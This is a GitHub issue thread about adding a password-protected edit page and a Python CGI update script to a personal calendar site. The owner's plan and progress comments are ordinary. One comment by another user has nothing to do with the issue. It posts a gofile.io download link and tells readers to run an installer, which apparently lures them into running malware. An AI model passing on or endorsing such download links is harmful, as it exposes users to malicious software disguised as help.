### ISSUE TITLE
add edit page

### ISSUE THREAD

**Issue by alifeee** [alifeee/simple-calendar#5]
it will look like the normal page, but every box will actually be an `<input type="text" id="2024-09-01" name="2024-09-01">` and there will be a form submit button at the bottom.

There should be an `/edit/alfie` and `/edit/gary` etc., so that you only see one person's worth of events at once. These links can appear at the top by the list of names.

A CGI script (probably with Python) will receive a POST request from the form (via an password-protected nginx block for the path `/edit` e.g.,) and:

```text
read the current calendar.yaml
make a backup named the current date and put it in some backups folder
for each non-empty date in the received params from the POST request:
  write a line in the YAML like this:
    '2024-09-02: "event for today"'
  attempt a rebuild of the site
  if successul:
    redirect to the main page
  else:
    return error, meta refresh to the main page
```

#4 should be done first

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by alifeee** [comment]
to rebuild site (with npm, which can be a pain), see:

https://github.com/alifeee/ringram/blob/b4bb9bdf9ad2f4fec1f90b24c357d7d9afcbbbf2/update.sh#L41-L47

**Comment by alifeee** [comment]
for Python CGI help, see https://github.com/alifeee/occupation-data/blob/main/pie.cgi

**Comment by alifeee** [comment]
todo:

- [x] nginx configuration (for `cal.alifeee.co.uk`)
- [x] python CGI script to update `alfie.yaml` (see above)
- [x] figure out how to trigger an `npm run build` with the Python script

**Comment by alifeee** [comment]
done :)

I should probably rename this repository, especially since I hard-coded the "what is this" to be "my social calendar"

maybe later. maybe never.
